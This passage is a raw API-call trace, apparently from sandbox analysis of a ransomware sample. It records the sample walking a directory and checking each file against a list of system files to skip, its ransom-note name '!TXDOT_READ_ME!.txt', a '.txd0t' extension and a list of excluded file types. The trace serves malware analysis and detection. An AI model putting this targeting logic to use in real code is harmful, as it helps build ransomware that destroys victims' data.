ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x2d200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="RGB9RAST_x64.msi", cAlternateFileName="RGB9RA~1.MSI")) returned 1 [0071.750] StrCmpW (psz1="RGB9RAST_x64.msi", psz2=".") returned 1 [0071.750] StrCmpW (psz1="RGB9RAST_x64.msi", psz2="..") returned 1 [0071.750] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.750] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.750] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="RGB9RAST_x64.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi") returned="C:\\588bce7c90097ed212\\RGB9RAST_x64.msi" [0071.750] PathFindExtensionW (pszPath="RGB9RAST_x64.msi") returned=".msi" [0071.750] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="bootsect.bak") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="iconcache.db") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="thumbs.db") returned -1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2=" ransomware ") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2=" ransom ") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="debug.txt") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="boot.ini") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="desktop.ini") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="autorun.inf") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="ntuser.dat") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="ntldr") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="ntdetect.com") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="bootfont.bin") returned 1 [0071.750] StrCmpIW (psz1="RGB9RAST_x64.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.750] PathFindExtensionW (pszPath="RGB9RAST_x64.msi") returned=".msi" [0071.750] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0071.750] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.750] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.750] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.750] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.750] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.751] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.751] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x177c8300, ftCreationTime.dwHighDateTime=0x1ca2a1b, ftLastAccessTime.dwLowDateTime=0x177c8300, ftLastAccessTime.dwHighDateTime=0x1ca2a1b, ftLastWriteTime.dwLowDateTime=0x177c8300, ftLastWriteTime.dwHighDateTime=0x1ca2a1b, nFileSizeHigh=0x0, nFileSizeLow=0x17200, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="RGB9Rast_x86.msi", cAlternateFileName="RGB9RA~2.MSI")) returned 1 [0071.751] StrCmpW (psz1="RGB9Rast_x86.msi", psz2=".") returned 1 [0071.751] StrCmpW (psz1="RGB9Rast_x86.msi", psz2="..") returned 1 [0071.751] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.751] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.751] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="RGB9Rast_x86.msi", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi" [0071.751] PathFindExtensionW (pszPath="RGB9Rast_x86.msi") returned=".msi" [0071.751] StrCmpW (psz1=".msi", psz2=".txd0t") returned -1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="bootsect.bak") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="iconcache.db") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="thumbs.db") returned -1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2=" ransomware ") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2=" ransom ") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="debug.txt") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="boot.ini") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="desktop.ini") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="autorun.inf") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="ntuser.dat") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="ntldr") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="ntdetect.com") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="bootfont.bin") returned 1 [0071.751] StrCmpIW (psz1="RGB9Rast_x86.msi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.751] PathFindExtensionW (pszPath="RGB9Rast_x86.msi") returned=".msi" [0071.751] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".msi") returned 0x0 [0071.751] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.751] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.751] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.751] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.751] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.751] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.751] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0071.751] StrCmpW (psz1="Setup.exe", psz2=".") returned 1 [0071.752] StrCmpW (psz1="Setup.exe", psz2="..") returned 1 [0071.752] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.752] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.752] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Setup.exe", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Setup.exe") returned="C:\\588bce7c90097ed212\\Setup.exe" [0071.752] PathFindExtensionW (pszPath="Setup.exe") returned=".exe" [0071.752] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="bootsect.bak") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="iconcache.db") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="thumbs.db") returned -1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2=" ransomware ") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2=" ransom ") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="debug.txt") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="boot.ini") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="desktop.ini") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="autorun.inf") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="ntuser.dat") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="ntldr") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="ntdetect.com") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="bootfont.bin") returned 1 [0071.752] StrCmpIW (psz1="Setup.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.752] PathFindExtensionW (pszPath="Setup.exe") returned=".exe" [0071.752] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0071.752] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0xc5158, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupEngine.dll", cAlternateFileName="SETUPE~1.DLL")) returned 1 [0071.752] StrCmpW (psz1="SetupEngine.dll", psz2=".") returned 1 [0071.752] StrCmpW (psz1="SetupEngine.dll", psz2="..") returned 1 [0071.752] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.752] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.752] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupEngine.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupEngine.dll") returned="C:\\588bce7c90097ed212\\SetupEngine.dll" [0071.752] PathFindExtensionW (pszPath="SetupEngine.dll") returned=".dll" [0071.752] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.752] StrCmpIW (psz1="SetupEngine.dll", psz2="bootsect.bak") returned 1 [0071.752] StrCmpIW (psz1="SetupEngine.dll", psz2="iconcache.db") returned 1 [0071.752] StrCmpIW (psz1="SetupEngine.dll", psz2="thumbs.db") returned -1 [0071.752] StrCmpIW (psz1="SetupEngine.dll", psz2=" ransomware ") returned 1 [0071.753] StrCmpIW (psz1="SetupEngine.dll", psz2=" ransom ") returned 1 [0071.753] StrCmpIW (psz1="SetupEngine.dll", psz2="debug.txt") returned 1 [0071.753] StrCmpIW (psz1="SetupEngine.dll", psz2="boot.ini") returned 1 [0071.753] StrCmpIW (psz1="SetupEngine.dll", psz2="desktop.ini") returned 1 [0071.753] StrCmpIW (psz1="SetupEngine.dll", psz2="autorun.inf") returned 1 [0071.753] StrCmpIW (psz1="SetupEngine.dll", psz2="ntuser.dat") returned 1 [0071.753] StrCmpIW (psz1="SetupEngine.dll", psz2="ntldr") returned 1 [0071.753] StrCmpIW (psz1="SetupEngine.dll", psz2="ntdetect.com") returned 1 [0071.753] StrCmpIW (psz1="SetupEngine.dll", psz2="bootfont.bin") returned 1 [0071.753] StrCmpIW (psz1="SetupEngine.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.753] PathFindExtensionW (pszPath="SetupEngine.dll") returned=".dll" [0071.753] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.753] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x48150, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUi.dll", cAlternateFileName="")) returned 1 [0071.753] StrCmpW (psz1="SetupUi.dll", psz2=".") returned 1 [0071.753] StrCmpW (psz1="SetupUi.dll", psz2="..") returned 1 [0071.753] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.753] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.753] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUi.dll", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUi.dll") returned="C:\\588bce7c90097ed212\\SetupUi.dll" [0071.753] PathFindExtensionW (pszPath="SetupUi.dll") returned=".dll" [0071.753] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="bootsect.bak") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="iconcache.db") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="thumbs.db") returned -1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2=" ransomware ") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2=" ransom ") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="debug.txt") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="boot.ini") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="desktop.ini") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="autorun.inf") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="ntuser.dat") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="ntldr") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="ntdetect.com") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="bootfont.bin") returned 1 [0071.753] StrCmpIW (psz1="SetupUi.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.753] PathFindExtensionW (pszPath="SetupUi.dll") returned=".dll" [0071.754] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.754] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5381000, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x5381000, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x5381000, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x75a8, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUi.xsd", cAlternateFileName="")) returned 1 [0071.754] StrCmpW (psz1="SetupUi.xsd", psz2=".") returned 1 [0071.754] StrCmpW (psz1="SetupUi.xsd", psz2="..") returned 1 [0071.754] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.754] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.754] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUi.xsd", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUi.xsd") returned="C:\\588bce7c90097ed212\\SetupUi.xsd" [0071.754] PathFindExtensionW (pszPath="SetupUi.xsd") returned=".xsd" [0071.754] StrCmpW (psz1=".xsd", psz2=".txd0t") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="bootsect.bak") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="iconcache.db") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="thumbs.db") returned -1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2=" ransomware ") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2=" ransom ") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="debug.txt") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="boot.ini") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="desktop.ini") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="autorun.inf") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="ntuser.dat") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="ntldr") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="ntdetect.com") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="bootfont.bin") returned 1 [0071.754] StrCmpIW (psz1="SetupUi.xsd", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.754] PathFindExtensionW (pszPath="SetupUi.xsd") returned=".xsd" [0071.754] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xsd") returned 0x0 [0071.754] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.754] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.754] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.754] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.755] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.755] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.755] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6519be00, ftCreationTime.dwHighDateTime=0x1cac6d5, ftLastAccessTime.dwLowDateTime=0x6519be00, ftLastAccessTime.dwHighDateTime=0x1cac6d5, ftLastWriteTime.dwLowDateTime=0x6519be00, ftLastWriteTime.dwHighDateTime=0x1cac6d5, nFileSizeHigh=0x0, nFileSizeLow=0x17758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupUtility.exe", cAlternateFileName="SETUPU~1.EXE")) returned 1 [0071.755] StrCmpW (psz1="SetupUtility.exe", psz2=".") returned 1 [0071.755] StrCmpW (psz1="SetupUtility.exe", psz2="..") returned 1 [0071.755] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.755] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.755] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SetupUtility.exe", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SetupUtility.exe") returned="C:\\588bce7c90097ed212\\SetupUtility.exe" [0071.755] PathFindExtensionW (pszPath="SetupUtility.exe") returned=".exe" [0071.755] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="bootsect.bak") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="iconcache.db") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="thumbs.db") returned -1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2=" ransomware ") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2=" ransom ") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="debug.txt") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="boot.ini") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="desktop.ini") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="autorun.inf") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="ntuser.dat") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="ntldr") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="ntdetect.com") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="bootfont.bin") returned 1 [0071.755] StrCmpIW (psz1="SetupUtility.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.755] PathFindExtensionW (pszPath="SetupUtility.exe") returned=".exe" [0071.755] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0071.755] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce333000, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xce333000, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xce333000, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0xa078, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SplashScreen.bmp", cAlternateFileName="SPLASH~1.BMP")) returned 1 [0071.755] StrCmpW (psz1="SplashScreen.bmp", psz2=".") returned 1 [0071.755] StrCmpW (psz1="SplashScreen.bmp", psz2="..") returned 1 [0071.755] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.755] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.755] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="SplashScreen.bmp", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned="C:\\588bce7c90097ed212\\SplashScreen.bmp" [0071.755] PathFindExtensionW (pszPath="SplashScreen.bmp") returned=".bmp" [0071.756] StrCmpW (psz1=".bmp", psz2=".txd0t") returned -1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="bootsect.bak") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="iconcache.db") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="thumbs.db") returned -1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2=" ransomware ") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2=" ransom ") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="debug.txt") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="boot.ini") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="desktop.ini") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="autorun.inf") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="ntuser.dat") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="ntldr") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="ntdetect.com") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="bootfont.bin") returned 1 [0071.756] StrCmpIW (psz1="SplashScreen.bmp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.756] PathFindExtensionW (pszPath="SplashScreen.bmp") returned=".bmp" [0071.756] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".bmp") returned 0x0 [0071.756] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.756] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, 